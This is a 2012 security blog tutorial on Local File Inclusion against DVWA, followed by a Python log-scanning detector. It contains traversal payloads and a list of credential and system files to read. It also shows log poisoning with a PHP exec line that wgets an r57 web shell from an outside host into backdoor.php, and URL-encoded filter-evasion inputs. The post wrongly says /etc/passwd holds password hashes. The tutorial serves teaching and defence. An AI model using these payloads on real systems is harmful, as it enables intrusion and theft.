Saturday, March 03, 2012

Local File Inclusion 101

Local File Inclusion, or LFI, is a vulnerability that lets an attacker supply directory traversal characters (or an arbitrary path) to a web application so that it includes files the developer never intended to serve. This happens when the file name passed to a page include is not sanitized. Here is sample code from Damn Vulnerable Web Application (DVWA):


<?php

     $file = $_GET['page']; // The page we wish to display, taken straight from the query string
                            // DVWA later hands $file to include() without checking it

?>


Here is the sample link of the vulnerable path : http://127.0.0.1/vulnerabilities/fi/?page=include.php

[image: file inclusion]

Now let us try a directory traversal to the passwd file of the web server:

http://127.0.0.1/vulnerabilities/fi/?page=/etc/passwd


In most cases you just need to add a few ../ before /etc/passwd:

http://127.0.0.1/vulnerabilities/fi/?page=../etc/passwd

http://127.0.0.1/vulnerabilities/fi/?page=../../etc/passwd

http://127.0.0.1/vulnerabilities/fi/?page=../../../etc/passwd

So on and so forth until you see the image above. This is very dangerous, especially if it is a Linux server, because the passwd file shows the hashes of the passwords on the server, which could possibly be cracked in order to gain access to the server.

You can also read other files that are useful for information gathering, and with some luck learn more about the web server:

/etc/environment
/etc/shadow
/etc/sudoers
/etc/group
/etc/resolv.conf
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
/var/log/messages
/var/log/mysql.log
/var/log/user.log
/var/www/logs/error_log


There are many ways to exploit a web server. An attacker could inject PHP code or a backdoor into the HTTPD logs and then access them via LFI again:
/var/log/apache/error_log
/apache/logs/access.log
/var/log/error.log

/* and many more */

Other people may also use the Firefox add-on User-Agent Switcher and spawn a shell:

<?exec('wget http://www.localroot.ph/r57.txt -O backdoor.php');?>

Some admins filter common LFI attack strings, so what we are going to do to evade the filter is encode one or more characters as hexadecimal (URL encoding): the encoded input is decoded on its way to the page, while a PHP-side filter that looks for the literal characters never sees them. Example input:

http://127.0.0.1/vulnerabilities/fi/?page=%2Fvar%2Flog%2Fmessages
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fresolv.conf
http://127.0.0.1/vulnerabilities/fi/?page=%2Fetc%2Fpasswd
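From the defender's side, here is an added example (not code from this post or from DVWA) that runs over constructed Apache combined-format log lines and flags the patterns described above: ../ traversal and absolute system paths in a query parameter, including the URL-encoded and double-encoded forms that slip past a naive filter, and PHP open tags arriving in the User-Agent or Referer header, which is what log poisoning looks like before the log is included. All log lines, the path list and the indicator names are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log lines, constructed for this example (no real traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [03/Mar/2012:10:00:01 +0800] "GET /vulnerabilities/fi/?page=include.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
127.0.0.1 - - [03/Mar/2012:10:00:02 +0800] "GET /vulnerabilities/fi/?page=../../../etc/passwd HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
127.0.0.1 - - [03/Mar/2012:10:00:03 +0800] "GET /vulnerabilities/fi/?page=%2Fetc%2Fpasswd HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
127.0.0.1 - - [03/Mar/2012:10:00:04 +0800] "GET /vulnerabilities/fi/?page=include.php HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"
127.0.0.1 - - [03/Mar/2012:10:00:05 +0800] "GET /vulnerabilities/fi/?page=%252e%252e%2F%252e%252e%2Fetc%2Fpasswd HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')  # a ../ or ..\ path segment
SENSITIVE = re.compile(r'^/(etc|proc|var/log|usr/lib/security)(/|$)')  # absolute system path
PHP_TAG = re.compile(r'<\?')  # PHP open tag arriving inside a request header

def decode_fully(value, rounds=3):
    """Undo URL encoding repeatedly, so %2F, %2e and double-encoded %252e become literal."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the LFI indicators found in one combined-format log line (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    parts = m.group('request').split()  # "GET /path?query HTTP/1.1"
    query = urlsplit(parts[1]).query if len(parts) >= 2 else ''
    # parse_qs decodes once; decode_fully catches what a filter on the raw string misses
    for value in (v for vs in parse_qs(query, keep_blank_values=True).values() for v in vs):
        decoded = decode_fully(value)
        if TRAVERSAL.search(decoded) and 'traversal' not in findings:
            findings.append('traversal')
        if SENSITIVE.match(decoded) and 'sensitive-path' not in findings:
            findings.append('sensitive-path')
    # PHP tags in Referer/User-Agent mean someone is writing code into the log file
    if any(PHP_TAG.search(decode_fully(m.group(h))) for h in ('referer', 'ua')):
        findings.append('log-poisoning')
    return findings

def scan(log_text):
    """Map 1-based line number to its findings, for the lines that have any."""
    return {n: f for n, line in enumerate(log_text.splitlines(), 1) if (f := classify(line))}
```

Running scan(SAMPLE_LOG) flags lines 2 to 5 and leaves the legitimate first request alone; the double-encoded fifth line is caught only because the detector decodes more than once.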

About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security. He encourages other like-minded individuals to come forward and share their knowledge through blogging right here in the ROOTCON Blog section.

ROOTCON is managed by like-minded InfoSec professionals across the Philippines. All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.